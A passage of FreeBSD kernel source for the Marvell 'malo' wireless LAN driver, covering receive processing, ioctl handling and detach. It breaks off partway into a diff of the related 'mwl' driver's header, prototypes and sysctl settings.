malo_setmcastfilter(struct malo_softc *sc) { struct ifnet *ifp = sc->malo_ifp; struct ieee80211com *ic = ifp->if_l2com; struct ifmultiaddr *ifma; uint8_t macs[IEEE80211_ADDR_LEN * MALO_HAL_MCAST_MAX]; uint8_t *mp; int nmc; mp = macs; nmc = 0; if (ic->ic_opmode == IEEE80211_M_MONITOR || (ifp->if_flags & (IFF_ALLMULTI | IFF_PROMISC))) goto all; if_maddr_rlock(ifp); TAILQ_FOREACH(ifma, &ifp->if_multiaddrs, ifma_link) { if (ifma->ifma_addr->sa_family != AF_LINK) continue; if (nmc == MALO_HAL_MCAST_MAX) { ifp->if_flags |= IFF_ALLMULTI; if_maddr_runlock(ifp); goto all; } IEEE80211_ADDR_COPY(mp, LLADDR((struct sockaddr_dl *)ifma->ifma_addr)); mp += IEEE80211_ADDR_LEN, nmc++; } if_maddr_runlock(ifp); malo_hal_setmcast(sc->malo_mh, nmc, macs); all: /* * XXX we don't know how to set the f/w for supporting * IFF_ALLMULTI | IFF_PROMISC cases */ return; } static int malo_mode_init(struct malo_softc *sc) { struct ifnet *ifp = sc->malo_ifp; struct ieee80211com *ic = ifp->if_l2com; struct malo_hal *mh = sc->malo_mh; /* * NB: Ignore promisc in hostap mode; it's set by the * bridge. This is wrong but we have no way to * identify internal requests (from the bridge) * versus external requests such as for tcpdump. */ malo_hal_setpromisc(mh, (ifp->if_flags & IFF_PROMISC) && ic->ic_opmode != IEEE80211_M_HOSTAP); malo_setmcastfilter(sc); return ENXIO; } static void malo_tx_draintxq(struct malo_softc *sc, struct malo_txq *txq) { struct ieee80211_node *ni; struct malo_txbuf *bf; u_int ix; /* * NB: this assumes output has been stopped and * we do not need to block malo_tx_tasklet */ for (ix = 0;; ix++) { MALO_TXQ_LOCK(txq); bf = STAILQ_FIRST(&txq->active); if (bf == NULL) { MALO_TXQ_UNLOCK(txq); break; } STAILQ_REMOVE_HEAD(&txq->active, bf_list); MALO_TXQ_UNLOCK(txq); #ifdef MALO_DEBUG if (sc->malo_debug & MALO_DEBUG_RESET) { struct ifnet *ifp = sc->malo_ifp; struct ieee80211com *ic = ifp->if_l2com; const struct malo_txrec *tr = mtod(bf->bf_m, const struct malo_txrec *); malo_printtxbuf(bf, txq->qnum, ix); ieee80211_dump_pkt(ic, (const uint8_t *)&tr->wh, bf->bf_m->m_len - sizeof(tr->fwlen), 0, -1); } #endif /* MALO_DEBUG */ bus_dmamap_unload(sc->malo_dmat, bf->bf_dmamap); ni = bf->bf_node; bf->bf_node = NULL; if (ni != NULL) { /* * Reclaim node reference. */ ieee80211_free_node(ni); } m_freem(bf->bf_m); bf->bf_m = NULL; MALO_TXQ_LOCK(txq); STAILQ_INSERT_TAIL(&txq->free, bf, bf_list); txq->nfree++; MALO_TXQ_UNLOCK(txq); } } static void malo_stop_locked(struct ifnet *ifp, int disable) { struct malo_softc *sc = ifp->if_softc; struct malo_hal *mh = sc->malo_mh; int i; DPRINTF(sc, MALO_DEBUG_ANY, "%s: invalid %u if_flags 0x%x\n", __func__, sc->malo_invalid, ifp->if_flags); MALO_LOCK_ASSERT(sc); if (!(ifp->if_drv_flags & IFF_DRV_RUNNING)) return; /* * Shutdown the hardware and driver: * disable interrupts * turn off the radio * drain and release tx queues * * Note that some of this work is not possible if the hardware * is gone (invalid). */ ifp->if_drv_flags &= ~IFF_DRV_RUNNING; callout_stop(&sc->malo_watchdog_timer); sc->malo_timer = 0; /* diable interrupt. */ malo_hal_intrset(mh, 0); /* turn off the radio. */ malo_hal_setradio(mh, 0, MHP_AUTO_PREAMBLE); /* drain and release tx queues. */ for (i = 0; i < MALO_NUM_TX_QUEUES; i++) malo_tx_draintxq(sc, &sc->malo_txq[i]); } static int malo_ioctl(struct ifnet *ifp, u_long cmd, caddr_t data) { #define MALO_IS_RUNNING(ifp) \ ((ifp->if_flags & IFF_UP) && (ifp->if_drv_flags & IFF_DRV_RUNNING)) struct malo_softc *sc = ifp->if_softc; struct ieee80211com *ic = ifp->if_l2com; struct ifreq *ifr = (struct ifreq *) data; int error = 0, startall = 0; MALO_LOCK(sc); switch (cmd) { case SIOCSIFFLAGS: if (MALO_IS_RUNNING(ifp)) { /* * To avoid rescanning another access point, * do not call malo_init() here. Instead, * only reflect promisc mode settings. */ malo_mode_init(sc); } else if (ifp->if_flags & IFF_UP) { /* * Beware of being called during attach/detach * to reset promiscuous mode. In that case we * will still be marked UP but not RUNNING. * However trying to re-init the interface * is the wrong thing to do as we've already * torn down much of our state. There's * probably a better way to deal with this. */ if (!sc->malo_invalid) { malo_init_locked(sc); startall = 1; } } else malo_stop_locked(ifp, 1); break; case SIOCGIFMEDIA: case SIOCSIFMEDIA: error = ifmedia_ioctl(ifp, ifr, &ic->ic_media, cmd); break; default: error = ether_ioctl(ifp, cmd, data); break; } MALO_UNLOCK(sc); if (startall) ieee80211_start_all(ic); return error; #undef MALO_IS_RUNNING } /* * Callback from the 802.11 layer to update the slot time * based on the current setting. We use it to notify the * firmware of ERP changes and the f/w takes care of things * like slot time and preamble. */ static void malo_updateslot(struct ifnet *ifp) { struct malo_softc *sc = ifp->if_softc; struct ieee80211com *ic = ifp->if_l2com; struct malo_hal *mh = sc->malo_mh; int error; /* NB: can be called early; suppress needless cmds */ if ((ifp->if_drv_flags & IFF_DRV_RUNNING) == 0) return; DPRINTF(sc, MALO_DEBUG_RESET, "%s: chan %u MHz/flags 0x%x %s slot, (ic_flags 0x%x)\n", __func__, ic->ic_curchan->ic_freq, ic->ic_curchan->ic_flags, ic->ic_flags & IEEE80211_F_SHSLOT ? "short" : "long", ic->ic_flags); if (ic->ic_flags & IEEE80211_F_SHSLOT) error = malo_hal_set_slot(mh, 1); else error = malo_hal_set_slot(mh, 0); if (error != 0) device_printf(sc->malo_dev, "setting %s slot failed\n", ic->ic_flags & IEEE80211_F_SHSLOT ? "short" : "long"); } static int malo_newstate(struct ieee80211vap *vap, enum ieee80211_state nstate, int arg) { struct ieee80211com *ic = vap->iv_ic; struct malo_softc *sc = ic->ic_ifp->if_softc; struct malo_hal *mh = sc->malo_mh; int error; DPRINTF(sc, MALO_DEBUG_STATE, "%s: %s -> %s\n", __func__, ieee80211_state_name[vap->iv_state], ieee80211_state_name[nstate]); /* * Invoke the net80211 layer first so iv_bss is setup. */ error = MALO_VAP(vap)->malo_newstate(vap, nstate, arg); if (error != 0) return error; if (nstate == IEEE80211_S_RUN && vap->iv_state != IEEE80211_S_RUN) { struct ieee80211_node *ni = vap->iv_bss; enum ieee80211_phymode mode = ieee80211_chan2mode(ni->ni_chan); const struct ieee80211_txparam *tp = &vap->iv_txparms[mode]; DPRINTF(sc, MALO_DEBUG_STATE, "%s: %s(RUN): iv_flags 0x%08x bintvl %d bssid %s " "capinfo 0x%04x chan %d associd 0x%x mode %d rate %d\n", vap->iv_ifp->if_xname, __func__, vap->iv_flags, ni->ni_intval, ether_sprintf(ni->ni_bssid), ni->ni_capinfo, ieee80211_chan2ieee(ic, ic->ic_curchan), ni->ni_associd, mode, tp->ucastrate); malo_hal_setradio(mh, 1, (ic->ic_flags & IEEE80211_F_SHPREAMBLE) ? MHP_SHORT_PREAMBLE : MHP_LONG_PREAMBLE); malo_hal_setassocid(sc->malo_mh, ni->ni_bssid, ni->ni_associd); malo_hal_set_rate(mh, mode, tp->ucastrate == IEEE80211_FIXED_RATE_NONE ? 0 : malo_fix2rate(tp->ucastrate)); } return 0; } static int malo_raw_xmit(struct ieee80211_node *ni, struct mbuf *m, const struct ieee80211_bpf_params *params) { struct ieee80211com *ic = ni->ni_ic; struct ifnet *ifp = ic->ic_ifp; struct malo_softc *sc = ifp->if_softc; struct malo_txbuf *bf; struct malo_txq *txq; if ((ifp->if_drv_flags & IFF_DRV_RUNNING) == 0 || sc->malo_invalid) { ieee80211_free_node(ni); m_freem(m); return ENETDOWN; } /* * Grab a TX buffer and associated resources. Note that we depend * on the classification by the 802.11 layer to get to the right h/w * queue. Management frames must ALWAYS go on queue 1 but we * cannot just force that here because we may receive non-mgt frames. */ txq = &sc->malo_txq[0]; bf = malo_getbuf(sc, txq); if (bf == NULL) { /* XXX blocks other traffic */ ifp->if_drv_flags |= IFF_DRV_OACTIVE; ieee80211_free_node(ni); m_freem(m); return ENOBUFS; } /* * Pass the frame to the h/w for transmission. */ if (malo_tx_start(sc, ni, bf, m) != 0) { ifp->if_oerrors++; bf->bf_m = NULL; bf->bf_node = NULL; MALO_TXQ_LOCK(txq); STAILQ_INSERT_HEAD(&txq->free, bf, bf_list); txq->nfree++; MALO_TXQ_UNLOCK(txq); ieee80211_free_node(ni); return EIO; /* XXX */ } /* * NB: We don't need to lock against tx done because this just * prods the firmware to check the transmit descriptors. The firmware * will also start fetching descriptors by itself if it notices * new ones are present when it goes to deliver a tx done interrupt * to the host. So if we race with tx done processing it's ok. * Delivering the kick here rather than in malo_tx_start is * an optimization to avoid poking the firmware for each packet. * * NB: the queue id isn't used so 0 is ok. */ malo_hal_txstart(sc->malo_mh, 0/*XXX*/); return 0; } static void malo_sysctlattach(struct malo_softc *sc) { #ifdef MALO_DEBUG struct sysctl_ctx_list *ctx = device_get_sysctl_ctx(sc->malo_dev); struct sysctl_oid *tree = device_get_sysctl_tree(sc->malo_dev); sc->malo_debug = malo_debug; SYSCTL_ADD_INT(ctx, SYSCTL_CHILDREN(tree), OID_AUTO, "debug", CTLFLAG_RW, &sc->malo_debug, 0, "control debugging printfs"); #endif } static void malo_announce(struct malo_softc *sc) { struct ifnet *ifp = sc->malo_ifp; if_printf(ifp, "versions [hw %d fw %d.%d.%d.%d] (regioncode %d)\n", sc->malo_hwspecs.hwversion, (sc->malo_hwspecs.fw_releasenum >> 24) & 0xff, (sc->malo_hwspecs.fw_releasenum >> 16) & 0xff, (sc->malo_hwspecs.fw_releasenum >> 8) & 0xff, (sc->malo_hwspecs.fw_releasenum >> 0) & 0xff, sc->malo_hwspecs.regioncode); if (bootverbose || malo_rxbuf != MALO_RXBUF) if_printf(ifp, "using %u rx buffers\n", malo_rxbuf); if (bootverbose || malo_txbuf != MALO_TXBUF) if_printf(ifp, "using %u tx buffers\n", malo_txbuf); } /* * Convert net80211 channel to a HAL channel. */ static void malo_mapchan(struct malo_hal_channel *hc, const struct ieee80211_channel *chan) { hc->channel = chan->ic_ieee; *(uint32_t *)&hc->flags = 0; if (IEEE80211_IS_CHAN_2GHZ(chan)) hc->flags.freqband = MALO_FREQ_BAND_2DOT4GHZ; } /* * Set/change channels. If the channel is really being changed, * it's done by reseting the chip. To accomplish this we must * first cleanup any pending DMA, then restart stuff after a la * malo_init. */ static int malo_chan_set(struct malo_softc *sc, struct ieee80211_channel *chan) { struct malo_hal *mh = sc->malo_mh; struct malo_hal_channel hchan; DPRINTF(sc, MALO_DEBUG_RESET, "%s: chan %u MHz/flags 0x%x\n", __func__, chan->ic_freq, chan->ic_flags); /* * Convert to a HAL channel description with the flags constrained * to reflect the current operating mode. */ malo_mapchan(&hchan, chan); malo_hal_intrset(mh, 0); /* disable interrupts */ malo_hal_setchannel(mh, &hchan); malo_hal_settxpower(mh, &hchan); /* * Update internal state. */ sc->malo_tx_th.wt_chan_freq = htole16(chan->ic_freq); sc->malo_rx_th.wr_chan_freq = htole16(chan->ic_freq); if (IEEE80211_IS_CHAN_ANYG(chan)) { sc->malo_tx_th.wt_chan_flags = htole16(IEEE80211_CHAN_G); sc->malo_rx_th.wr_chan_flags = htole16(IEEE80211_CHAN_G); } else { sc->malo_tx_th.wt_chan_flags = htole16(IEEE80211_CHAN_B); sc->malo_rx_th.wr_chan_flags = htole16(IEEE80211_CHAN_B); } sc->malo_curchan = hchan; malo_hal_intrset(mh, sc->malo_imask); return 0; } static void malo_scan_start(struct ieee80211com *ic) { struct ifnet *ifp = ic->ic_ifp; struct malo_softc *sc = ifp->if_softc; DPRINTF(sc, MALO_DEBUG_STATE, "%s\n", __func__); } static void malo_scan_end(struct ieee80211com *ic) { struct ifnet *ifp = ic->ic_ifp; struct malo_softc *sc = ifp->if_softc; DPRINTF(sc, MALO_DEBUG_STATE, "%s\n", __func__); } static void malo_set_channel(struct ieee80211com *ic) { struct ifnet *ifp = ic->ic_ifp; struct malo_softc *sc = ifp->if_softc; (void) malo_chan_set(sc, ic->ic_curchan); } static void malo_rx_proc(void *arg, int npending) { #define IEEE80211_DIR_DSTODS(wh) \ ((((const struct ieee80211_frame *)wh)->i_fc[1] & \ IEEE80211_FC1_DIR_MASK) == IEEE80211_FC1_DIR_DSTODS) struct malo_softc *sc = arg; struct ifnet *ifp = sc->malo_ifp; struct ieee80211com *ic = ifp->if_l2com; struct malo_rxbuf *bf; struct malo_rxdesc *ds; struct mbuf *m, *mnew; struct ieee80211_qosframe *wh; struct ieee80211_qosframe_addr4 *wh4; struct ieee80211_node *ni; int off, len, hdrlen, pktlen, rssi, ntodo; uint8_t *data, status; uint32_t readptr, writeptr; DPRINTF(sc, MALO_DEBUG_RX_PROC, "%s: pending %u rdptr(0x%x) 0x%x wrptr(0x%x) 0x%x\n", __func__, npending, sc->malo_hwspecs.rxdesc_read, malo_bar0_read4(sc, sc->malo_hwspecs.rxdesc_read), sc->malo_hwspecs.rxdesc_write, malo_bar0_read4(sc, sc->malo_hwspecs.rxdesc_write)); readptr = malo_bar0_read4(sc, sc->malo_hwspecs.rxdesc_read); writeptr = malo_bar0_read4(sc, sc->malo_hwspecs.rxdesc_write); if (readptr == writeptr) return; bf = sc->malo_rxnext; for (ntodo = malo_rxquota; ntodo > 0 && readptr != writeptr; ntodo--) { if (bf == NULL) { bf = STAILQ_FIRST(&sc->malo_rxbuf); break; } ds = bf->bf_desc; if (bf->bf_m == NULL) { /* * If data allocation failed previously there * will be no buffer; try again to re-populate it. * Note the firmware will not advance to the next * descriptor with a dma buffer so we must mimic * this or we'll get out of sync. */ DPRINTF(sc, MALO_DEBUG_ANY, "%s: rx buf w/o dma memory\n", __func__); (void)malo_rxbuf_init(sc, bf); break; } MALO_RXDESC_SYNC(sc, ds, BUS_DMASYNC_POSTREAD | BUS_DMASYNC_POSTWRITE); if (ds->rxcontrol != MALO_RXD_CTRL_DMA_OWN) break; readptr = le32toh(ds->physnext); #ifdef MALO_DEBUG if (sc->malo_debug & MALO_DEBUG_RECV_DESC) malo_printrxbuf(bf, 0); #endif status = ds->status; if (status & MALO_RXD_STATUS_DECRYPT_ERR_MASK) { ifp->if_ierrors++; goto rx_next; } /* * Sync the data buffer. */ len = le16toh(ds->pktlen); bus_dmamap_sync(sc->malo_dmat, bf->bf_dmamap, BUS_DMASYNC_POSTREAD); /* * The 802.11 header is provided all or in part at the front; * use it to calculate the true size of the header that we'll * construct below. We use this to figure out where to copy * payload prior to constructing the header. */ m = bf->bf_m; data = mtod(m, uint8_t *); hdrlen = ieee80211_anyhdrsize(data + sizeof(uint16_t)); off = sizeof(uint16_t) + sizeof(struct ieee80211_frame_addr4); /* * Calculate RSSI. XXX wrong */ rssi = 2 * ((int) ds->snr - ds->nf); /* NB: .5 dBm */ if (rssi > 100) rssi = 100; pktlen = hdrlen + (len - off); /* * NB: we know our frame is at least as large as * IEEE80211_MIN_LEN because there is a 4-address frame at * the front. Hence there's no need to vet the packet length. * If the frame in fact is too small it should be discarded * at the net80211 layer. */ /* XXX don't need mbuf, just dma buffer */ mnew = malo_getrxmbuf(sc, bf); if (mnew == NULL) { ifp->if_ierrors++; goto rx_next; } /* * Attach the dma buffer to the mbuf; malo_rxbuf_init will * re-setup the rx descriptor using the replacement dma * buffer we just installed above. */ bf->bf_m = mnew; m->m_data += off - hdrlen; m->m_pkthdr.len = m->m_len = pktlen; m->m_pkthdr.rcvif = ifp; /* * Piece 802.11 header together. */ wh = mtod(m, struct ieee80211_qosframe *); /* NB: don't need to do this sometimes but ... */ /* XXX special case so we can memcpy after m_devget? */ ovbcopy(data + sizeof(uint16_t), wh, hdrlen); if (IEEE80211_QOS_HAS_SEQ(wh)) { if (IEEE80211_DIR_DSTODS(wh)) { wh4 = mtod(m, struct ieee80211_qosframe_addr4*); *(uint16_t *)wh4->i_qos = ds->qosctrl; } else { *(uint16_t *)wh->i_qos = ds->qosctrl; } } if (ieee80211_radiotap_active(ic)) { sc->malo_rx_th.wr_flags = 0; sc->malo_rx_th.wr_rate = ds->rate; sc->malo_rx_th.wr_antsignal = rssi; sc->malo_rx_th.wr_antnoise = ds->nf; } #ifdef MALO_DEBUG if (IFF_DUMPPKTS_RECV(sc, wh)) { ieee80211_dump_pkt(ic, mtod(m, caddr_t), len, ds->rate, rssi); } #endif ifp->if_ipackets++; /* dispatch */ ni = ieee80211_find_rxnode(ic, (struct ieee80211_frame_min *)wh); if (ni != NULL) { (void) ieee80211_input(ni, m, rssi, ds->nf); ieee80211_free_node(ni); } else (void) ieee80211_input_all(ic, m, rssi, ds->nf); rx_next: /* NB: ignore ENOMEM so we process more descriptors */ (void) malo_rxbuf_init(sc, bf); bf = STAILQ_NEXT(bf, bf_list); } malo_bar0_write4(sc, sc->malo_hwspecs.rxdesc_read, readptr); sc->malo_rxnext = bf; if ((ifp->if_drv_flags & IFF_DRV_OACTIVE) == 0 && !IFQ_IS_EMPTY(&ifp->if_snd)) malo_start(ifp); #undef IEEE80211_DIR_DSTODS } static void malo_stop(struct ifnet *ifp, int disable) { struct malo_softc *sc = ifp->if_softc; MALO_LOCK(sc); malo_stop_locked(ifp, disable); MALO_UNLOCK(sc); } /* * Reclaim all tx queue resources. */ static void malo_tx_cleanup(struct malo_softc *sc) { int i; for (i = 0; i < MALO_NUM_TX_QUEUES; i++) malo_tx_cleanupq(sc, &sc->malo_txq[i]); } int malo_detach(struct malo_softc *sc) { struct ifnet *ifp = sc->malo_ifp; struct ieee80211com *ic = ifp->if_l2com; DPRINTF(sc, MALO_DEBUG_ANY, "%s: if_flags %x\n", __func__, ifp->if_flags); malo_stop(ifp, 1); if (sc->malo_tq != NULL) { taskqueue_drain(sc->malo_tq, &sc->malo_rxtask); taskqueue_drain(sc->malo_tq, &sc->malo_txtask); taskqueue_free(sc->malo_tq); sc->malo_tq = NULL; } /* * NB: the order of these is important: * o call the 802.11 layer before detaching the hal to * insure callbacks into the driver to delete global * key cache entries can be handled * o reclaim the tx queue data structures after calling * the 802.11 layer as we'll get called back to reclaim * node state and potentially want to use them * o to cleanup the tx queues the hal is called, so detach * it last * Other than that, it's straightforward... */ ieee80211_ifdetach(ic); callout_drain(&sc->malo_watchdog_timer); malo_dma_cleanup(sc); malo_tx_cleanup(sc); malo_hal_detach(sc->malo_mh); if_free(ifp); MALO_LOCK_DESTROY(sc); return 0; } void malo_shutdown(struct malo_softc *sc) { malo_stop(sc->malo_ifp, 1); } void malo_suspend(struct malo_softc *sc) { struct ifnet *ifp = sc->malo_ifp; DPRINTF(sc, MALO_DEBUG_ANY, "%s: if_flags %x\n", __func__, ifp->if_flags); malo_stop(ifp, 1); } void malo_resume(struct malo_softc *sc) { struct ifnet *ifp = sc->malo_ifp; DPRINTF(sc, MALO_DEBUG_ANY, "%s: if_flags %x\n", __func__, ifp->if_flags); if (ifp->if_flags & IFF_UP) malo_init(sc); } diff --git a/sys/dev/mwl/if_mwl.c b/sys/dev/mwl/if_mwl.c index 8a3aca80a9fd..67fba35bcf8b 100644 --- a/sys/dev/mwl/if_mwl.c +++ b/sys/dev/mwl/if_mwl.c @@ -1,5053 +1,5054 @@ /*- * Copyright (c) 2007-2009 Sam Leffler, Errno Consulting * Copyright (c) 2007-2008 Marvell Semiconductor, Inc. * All rights reserved. * * Redistribution and use in source and binary forms, with or without * modification, are permitted provided that the following conditions * are met: * 1. Redistributions of source code must retain the above copyright * notice, this list of conditions and the following disclaimer, * without modification. * 2. Redistributions in binary form must reproduce at minimum a disclaimer * similar to the "NO WARRANTY" disclaimer below ("Disclaimer") and any * redistribution must be conditioned upon including a substantially * similar Disclaimer requirement for further binary redistribution. * * NO WARRANTY * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS * ``AS IS'' AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT * LIMITED TO, THE IMPLIED WARRANTIES OF NONINFRINGEMENT, MERCHANTIBILITY * AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL * THE COPYRIGHT HOLDERS OR CONTRIBUTORS BE LIABLE FOR SPECIAL, EXEMPLARY, * OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF * SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS * INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER * IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF * THE POSSIBILITY OF SUCH DAMAGES. */ #include __FBSDID("$FreeBSD$"); /* * Driver for the Marvell 88W8363 Wireless LAN controller. */ #include "opt_inet.h" #include "opt_mwl.h" #include "opt_wlan.h" #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #ifdef INET #include #include #endif /* INET */ #include #include /* idiomatic shorthands: MS = mask+shift, SM = shift+mask */ #define MS(v,x) (((v) & x) >> x##_S) #define SM(v,x) (((v) << x##_S) & x) static struct ieee80211vap *mwl_vap_create(struct ieee80211com *, const char [IFNAMSIZ], int, enum ieee80211_opmode, int, const uint8_t [IEEE80211_ADDR_LEN], const uint8_t [IEEE80211_ADDR_LEN]); static void mwl_vap_delete(struct ieee80211vap *); static int mwl_setupdma(struct mwl_softc *); static int mwl_hal_reset(struct mwl_softc *sc); static int mwl_init_locked(struct mwl_softc *); static void mwl_init(void *); static void mwl_stop_locked(struct ifnet *, int); static int mwl_reset(struct ieee80211vap *, u_long); static void mwl_stop(struct ifnet *, int); static void mwl_start(struct ifnet *); static int mwl_raw_xmit(struct ieee80211_node *, struct mbuf *, const struct ieee80211_bpf_params *); static int mwl_media_change(struct ifnet *); static void mwl_watchdog(void *); static int mwl_ioctl(struct ifnet *, u_long, caddr_t); static void mwl_radar_proc(void *, int); static void mwl_chanswitch_proc(void *, int); static void mwl_bawatchdog_proc(void *, int); static int mwl_key_alloc(struct ieee80211vap *, struct ieee80211_key *, ieee80211_keyix *, ieee80211_keyix *); static int mwl_key_delete(struct ieee80211vap *, const struct ieee80211_key *); static int mwl_key_set(struct ieee80211vap *, const struct ieee80211_key *, const uint8_t mac[IEEE80211_ADDR_LEN]); static int mwl_mode_init(struct mwl_softc *); static void mwl_update_mcast(struct ifnet *); static void mwl_update_promisc(struct ifnet *); static void mwl_updateslot(struct ifnet *); static int mwl_beacon_setup(struct ieee80211vap *); static void mwl_beacon_update(struct ieee80211vap *, int); #ifdef MWL_HOST_PS_SUPPORT static void mwl_update_ps(struct ieee80211vap *, int); static int mwl_set_tim(struct ieee80211_node *, int); #endif static int mwl_dma_setup(struct mwl_softc *); static void mwl_dma_cleanup(struct mwl_softc *); static struct ieee80211_node *mwl_node_alloc(struct ieee80211vap *, const uint8_t [IEEE80211_ADDR_LEN]); static void mwl_node_cleanup(struct ieee80211_node *); static void mwl_node_drain(struct ieee80211_node *); static void mwl_node_getsignal(const struct ieee80211_node *, int8_t *, int8_t *); static void mwl_node_getmimoinfo(const struct ieee80211_node *, struct ieee80211_mimo_info *); static int mwl_rxbuf_init(struct mwl_softc *, struct mwl_rxbuf *); static void mwl_rx_proc(void *, int); static void mwl_txq_init(struct mwl_softc *sc, struct mwl_txq *, int); static int mwl_tx_setup(struct mwl_softc *, int, int); static int mwl_wme_update(struct ieee80211com *); static void mwl_tx_cleanupq(struct mwl_softc *, struct mwl_txq *); static void mwl_tx_cleanup(struct mwl_softc *); static uint16_t mwl_calcformat(uint8_t rate, const struct ieee80211_node *); static int mwl_tx_start(struct mwl_softc *, struct ieee80211_node *, struct mwl_txbuf *, struct mbuf *); static void mwl_tx_proc(void *, int); static int mwl_chan_set(struct mwl_softc *, struct ieee80211_channel *); static void mwl_draintxq(struct mwl_softc *); static void mwl_cleartxq(struct mwl_softc *, struct ieee80211vap *); static int mwl_recv_action(struct ieee80211_node *, const struct ieee80211_frame *, const uint8_t *, const uint8_t *); static int mwl_addba_request(struct ieee80211_node *, struct ieee80211_tx_ampdu *, int dialogtoken, int baparamset, int batimeout); static int mwl_addba_response(struct ieee80211_node *, struct ieee80211_tx_ampdu *, int status, int baparamset, int batimeout); static void mwl_addba_stop(struct ieee80211_node *, struct ieee80211_tx_ampdu *); static int mwl_startrecv(struct mwl_softc *); static MWL_HAL_APMODE mwl_getapmode(const struct ieee80211vap *, struct ieee80211_channel *); static int mwl_setapmode(struct ieee80211vap *, struct ieee80211_channel*); static void mwl_scan_start(struct ieee80211com *); static void mwl_scan_end(struct ieee80211com *); static void mwl_set_channel(struct ieee80211com *); static int mwl_peerstadb(struct ieee80211_node *, int aid, int staid, MWL_HAL_PEERINFO *pi); static int mwl_localstadb(struct ieee80211vap *); static int mwl_newstate(struct ieee80211vap *, enum ieee80211_state, int); static int allocstaid(struct mwl_softc *sc, int aid); static void delstaid(struct mwl_softc *sc, int staid); static void mwl_newassoc(struct ieee80211_node *, int); static void mwl_agestations(void *); static int mwl_setregdomain(struct ieee80211com *, struct ieee80211_regdomain *, int, struct ieee80211_channel []); static void mwl_getradiocaps(struct ieee80211com *, int, int *, struct ieee80211_channel []); static int mwl_getchannels(struct mwl_softc *); static void mwl_sysctlattach(struct mwl_softc *); static void mwl_announce(struct mwl_softc *); SYSCTL_NODE(_hw, OID_AUTO, mwl, CTLFLAG_RD, 0, "Marvell driver parameters"); static int mwl_rxdesc = MWL_RXDESC; /* # rx desc's to allocate */ SYSCTL_INT(_hw_mwl, OID_AUTO, rxdesc, CTLFLAG_RW, &mwl_rxdesc, 0, "rx descriptors allocated"); static int mwl_rxbuf = MWL_RXBUF; /* # rx buffers to allocate */ SYSCTL_INT(_hw_mwl, OID_AUTO, rxbuf, CTLFLAG_RW, &mwl_rxbuf, 0, "rx buffers allocated"); TUNABLE_INT("hw.mwl.rxbuf", &mwl_rxbuf); static int mwl_txbuf = MWL_TXBUF; /* # tx buffers to allocate */ SYSCTL_INT(_hw_mwl, OID_AUTO, txbuf, CTLFLAG_RW, &mwl_txbuf, 0, "tx buffers allocated"); TUNABLE_INT("hw.mwl.txbuf", &mwl_txbuf); static int mwl_txcoalesce = 8; /* # tx packets to q before poking f/w*/ SYSCTL_INT(_hw_mwl, OID_AUTO, txcoalesce, CTLFLAG_RW, &mwl_txcoalesce, 0, "tx buffers to send at once"); TUNABLE_INT("hw.mwl.txcoalesce", &mwl_txcoalesce); static int mwl_rxquota = MWL_RXBUF; /* # max buffers to process */ SYSCTL_INT(_hw_mwl, OID_AUTO, rxquota, CTLFLAG_RW, &mwl_rxquota, 0, "max rx buffers to process per interrupt"); TUNABLE_INT("hw.mwl.rxquota", &mwl_rxquota); static int mwl_rxdmalow = 3; /* # min buffers for wakeup */ SYSCTL_INT(_hw_mwl, OID_AUTO, rxdmalow, CTLFLAG_RW, &mwl_rxdmalow, 0, "min free rx buffers before restarting traffic"); TUNABLE_INT("hw.mwl.rxdmalow", &mwl_rxdmalow); #ifdef MWL_DEBUG static int mwl_debug = 0; SYSCTL_INT(_hw_mwl, OID_AUTO, debug, CTLFLAG_RW, &mwl_debug, 0, "control debugging printfs"); TUNABLE_INT("hw.mwl.debug", &mwl_debug); enum { MWL_DEBUG_XMIT = 0x00000001, /* basic xmit operation */ MWL_DEBUG_XMIT_DESC = 0x00000002, /* xmit descriptors */ MWL_DEBUG_RECV = 0x00000004, /* basic recv operation */ MWL_DEBUG_RECV_DESC = 0x00000008, /* recv descriptors */ MWL_DEBUG_RESET = 0x00000010, /* reset processing */ MWL_DEBUG_BEACON = 0x00000020, /* beacon handling */ MWL_DEBUG_INTR = 0x00000040, /* ISR */ MWL_DEBUG_TX_PROC = 0x00000080, /* tx ISR proc */ MWL_DEBUG_RX_PROC = 0x00000100, /* rx ISR proc */ MWL_DEBUG_KEYCACHE = 0x00000200, /* key cache management */ MWL_DEBUG_STATE = 0x00000400, /* 802.11 state transitions */ MWL_DEBUG_NODE = 0x00000800, /* node management */ MWL_DEBUG_RECV_ALL = 0x00001000, /* trace all frames (beacons) */ MWL_DEBUG_TSO = 0x00002000, /* TSO processing */ MWL_DEBUG_AMPDU = 0x00004000, /* BA stream handling */ MWL_DEBUG_ANY = 0xffffffff }; #define IS_BEACON(wh) \ ((wh->i_fc[0] & (IEEE80211_FC0_TYPE_MASK|IEEE80211_FC0_SUBTYPE_MASK)) == \ (IEEE80211_FC0_TYPE_MGT|IEEE80211_FC0_SUBTYPE_BEACON)) #define IFF_DUMPPKTS_RECV(sc, wh) \ (((sc->sc_debug & MWL_DEBUG_RECV) && \ ((sc->sc_debug & MWL_DEBUG_RECV_ALL) || !IS_BEACON(wh))) || \ (sc->sc_ifp->if_flags & (IFF_DEBUG|IFF_LINK2)) == (IFF_DEBUG|IFF_LINK2)) #define IFF_DUMPPKTS_XMIT(sc) \ ((sc->sc_debug & MWL_DEBUG_XMIT) || \ (sc->sc_ifp->if_flags & (IFF_DEBUG|IFF_LINK2)) == (IFF_DEBUG|IFF_LINK2)) #define DPRINTF(sc, m, fmt, ...) do { \ if (sc->sc_debug & (m)) \ printf(fmt, __VA_ARGS__); \ } while (0) #define KEYPRINTF(sc, hk, mac) do { \ if (sc->sc_debug & MWL_DEBUG_KEYCACHE) \ mwl_keyprint(sc, __func__, hk, mac); \ } while (0) static void mwl_printrxbuf(const struct mwl_rxbuf *bf, u_int ix); static void mwl_printtxbuf(const struct mwl_txbuf *bf, u_int 